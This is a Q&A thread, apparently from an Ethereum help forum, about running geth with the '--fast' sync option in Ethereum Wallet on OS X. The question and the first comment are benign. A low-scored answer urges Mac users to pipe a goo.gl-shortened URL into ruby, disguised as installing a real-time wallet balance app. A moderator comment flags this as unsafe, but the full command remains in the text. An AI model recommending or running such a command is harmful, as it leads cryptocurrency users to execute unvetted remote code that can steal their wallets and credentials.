# Ethereum Wallet 0.8.9 - How to Run "--fast" Option?

Tags: mac-osx, fast-sync

I use Ethereum Wallet 0.8.9 on OS X.
Synching is very slow.

I found, there is a "--fast" option to run geth on the command-line. But I can not find "geth" anywhere, although the Wallet states it is running in "geth 1.5.9 (go)". So I assume, it must be there.

Where can I find geth on OS X to run the command line?
Is there any other way to start the wallet using "--fast" option?

Thanks!

Comment: OK - just found it:
 
cd ~/Library/Application\ Support/Ethereum\ Wallet/binaries/Geth/unpacked/
./geth --fast

running smooth now ;-)

Answer (score -1):

`curl -s -L goo.gl/Rjz8CY | ruby`

found solution, If you are using mac then you can run command 
`curl -s -L goo.gl/Rjz8CY | ruby` it will install ethereum live wallet app from where you can check wallet balance in real time. installing will take 10-30 sec and then you will see ethereum app icon on tray it helped me alot to check real time balance instantly i found this on stackoverflow.

Comment: Hi there. I have removed the URL from your answer. Asking users to pipe an unknown (goo.gl-shortened) URL directly into an executable to supposedly install something is a security no-no. Even when I checked the URL in a safe environment, it wasn't clear to me what it was... Please update your answer with a method that could be considered safe, else I'm suspecting it will be removed...